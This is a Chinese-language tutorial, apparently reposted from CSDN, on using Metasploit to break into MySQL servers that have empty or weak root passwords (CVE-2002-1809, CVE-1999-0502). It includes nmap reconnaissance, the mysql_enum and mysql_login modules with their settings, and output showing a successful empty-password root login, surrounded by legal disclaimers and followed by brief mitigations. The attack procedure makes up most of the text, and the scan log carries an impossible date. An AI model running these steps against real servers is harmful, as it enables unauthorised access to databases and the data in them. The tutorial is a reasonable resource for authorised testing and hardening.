使用 Metasploit 利用 MySQL 默认空密码或弱密码漏洞 (CVE-2002-1809, CNNVD-200212-263, CVE-1999-0502)
使用 Metasploit 利用 MySQL 默認空密碼或弱密碼漏洞 (CVE-2002-1809, CNNVD-200212-263, CVE-1999-0502)
警告
請勿將本文提到的任何技術用于非法用途。
請遵守《中華人民共和國刑法》《中華人民共和國網絡安全法》《中華人民共和國治安管理處罰法》和/或當地其他相關法律法規。
本文作者在進行試驗時已獲得省級相關部門和作者單位相關部門的批準。
特別提示
重要:在執行本文的任何攻擊命令前,請務必先充分考慮執行攻擊命令的后果。本文作者不對文章內容做任何擔保。
重要:執行本文的部分或全部命令有能違反中華人民共和國法律的可能性。在任何情況下,本文作者均不對本文提到的任何內容造成的任何結果承擔任何責任。
請充分考慮再決定是否閱讀本文。
協議
特別說明: 本文按“原樣”提供,不做任何明示或暗示的擔保,包括但不限于對適用性、正確性、使用情景合法性的擔保。在和任何情況下,作者均不對讀者使用本文提及的內容造成的結果進行賠償或承擔任何責任。
本作品采用 知識共享署名-禁止演繹 4.0 國際許可協議 進行許可。(CC-BY-ND 4.0)
當 CSDN 平臺提供的版權協議與本協議 (CC-BY-ND 4.0) 不一致時,以本協議為準。
Copyright ? 2022, 還沒想好昵稱的新建p
特別說明: 在轉載時,禁止對本文的任何內容進行修改。
特別說明: “警告”和“協議”的全部內容應該按原樣包含在本文的所有轉載副本內容中。
如果您不同意協議中的任何一項,請勿繼續閱讀或轉載,并關閉此頁面。
環境和約定
本文依據例行網絡安全監測監測的真實案例改編。
我們約定,除非另有說明,本文所提及的攻擊者和受害者 (靶機) 的 IP 地址和版本信息如下。
攻擊者: localhost, Kali Linux + Windows 10, metasploit/6.1.27, nmap/7.91
受害者: 192.168.1.100, 推理操作系統 Linux (93%), 未能精確匹配操作系統信息
為保護隱私,本文提到的 IP 地址等為虛擬。
目的
利用 MySQL 的空密碼或默認弱密碼登錄 MySQL。
CVE 信息
| CVE-2002-1809 | CNNVD-200212-263 | MySQL Null Root Password Weak默認配置漏洞 |
| CVE-1999-0502 | CNNVD-199803-001 | Unix賬戶漏洞 |
CVE-2002-1809, CNNVD-200212-263
MySQL 3.23.2 到 3.23.52 的 Windows 二進制版本中默認配置存在 NULL 根密碼。
CVE-1999-0502
Unix 賬戶存在默認、空、空白或丟失密碼漏洞。
滲透過程
0. 準備工作
0.1 使用 Nmap 掃描受害主機
通過如下命令對受害者掃描,得到開放端口、版本、操作系統推理等信息。
nmap -A 192.168.1.100通過觀察如下結果,可知受害者開放 3306 端口,服務為 mysql,版本 MySQL/5.5.20-log 脆弱。
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-29 02:33 China Standard Time Nmap scan report for 192.168.1.100 Host is up (0.041s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 3306/tcp open mysql MySQL 5.5.20-log | mysql-info: | Protocol: 10 | Version: 5.5.20-log | Thread ID: 233333333 | Capabilities flags: 23333 | Some Capabilities: … | Status: Autocommit | Salt: … |_ Auth Plugin Name: mysql_native_passwordAggressive OS guesses: Linux (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 3 hopsTRACEROUTE (using port 3389/tcp) HOP RTT ADDRESS 1 17.00 ms 192.168.0.1 2 18.00 ms 192.168.1.1 3 32.00 ms 192.168.1.100OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.33 seconds0.2 啟動 Metasploit
msfconsole進入 msfconsole 后,將看到啟動文字界面和 msf6 > 。依次輸入以下內容
1. 掃描用戶
1.1 使用輔助掃描工具 (Auxiliary)
掃描用戶時利用 CVE-2002-1809 漏洞。
使用如下命令選擇 Auxiliary。
msf6 > use auxiliary/admin/mysql/mysql_enum1.2 設置參數
使用如下命令查看該 Auxiliary 信息。
msf6 auxiliary(admin/mysql/mysql_enum) > show info使用如下命令設置 rhosts。
msf6 auxiliary(admin/mysql/mysql_enum) > set rhosts 192.168.1.100將得到如下提示:rhosts => 192.168.1.100
1.3 攻擊
警告
在執行任何攻擊命令前,請務必先充分考慮執行攻擊命令的后果。本文作者不對文章內容做任何擔保。
特別提示:執行此命令有違反中華人民共和國法律的可能性。在任何情況下,本文作者均不對本文提到的任何內容造成的任何結果承擔任何責任。
請充分考慮再決定是否繼續。
設置參數后便可攻擊受害者(亦可使用 run)。
exploit通常,將看到如下結果。
[*] Running module against 192.168.1.100
[*] 192.168.1.100:3306 - Enumerating Parameters
[*] (省略一些受害者版本信息)
[*] 192.168.1.100:3306 - Enumerating Accounts:
[+] (省略一些受害者用戶名密碼)
[*] (省略一些具有不同權限的用戶)
[*] Auxiliary module execution completed
2. 爆破口令
2.1 使用輔助掃描工具 (Auxiliary)
爆破口令時利用 CVE-1999-0502 漏洞。
使用如下命令選擇 Auxiliary。
msf6 > use auxiliary/scanner/mysql/mysql_login2.2 設置參數
使用如下命令查看該 Auxiliary 信息。
msf6 auxiliary(scanner/mysql/mysql_login) > show info使用如下命令設置 rhosts。
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.1.100將得到如下提示:rhosts => 192.168.1.100
如果受害者沒有 CVE-2002-1809, CNNVD-200212-263 漏洞,請使用 set … … 命令妥善設置用戶名、字典等,在此不作贅述。
2.3 攻擊
警告
在執行任何攻擊命令前,請務必先充分考慮執行攻擊命令的后果。本文作者不對文章內容做任何擔保。
特別提示:執行此命令有違反中華人民共和國法律的可能性。在任何情況下,本文作者均不對本文提到的任何內容造成的任何結果承擔任何責任。
請充分考慮再決定是否繼續。
設置參數后便可攻擊受害者(亦可使用 run)。
exploit通常,將看到如下結果。
[+] 192.168.1.100:3306 - 192.168.1.100:3306 - Found remote MySQL version 5.5.20
[!] 192.168.1.100:3306 - No active DB – Credential data will not be saved!
[+] 192.168.1.100:3306 - 192.168.1.100:3306 - Success: ‘root:’
[*] 192.168.1.100:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Enjoy it!
至此,滲透完成。
防護措施
- 升級 MySQL
- 更改強密碼
- 刪除不必要的用戶
- 更換 MySQL 端口,或使用 Unix Socket 套接字
- 禁止用戶遠程登陸
- 注意前端可能包含數據庫用戶名密碼的配置文件(如 CMS 使用的配置文件等)的權限
敬告
本文作者并不對上述防護措施有效性做任何擔保。
Copyright ? 2022, 還沒想好昵稱的新建p??( CC-BY-ND 4.0)
總結
以上是生活随笔為你收集整理的使用 Metasploit 利用 MySQL 默认空密码或弱密码漏洞 (CVE-2002-1809, CNNVD-200212-263, CVE-1999-0502)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 秦时明月更新了?青春回来了
- 下一篇: libSVM介绍(二)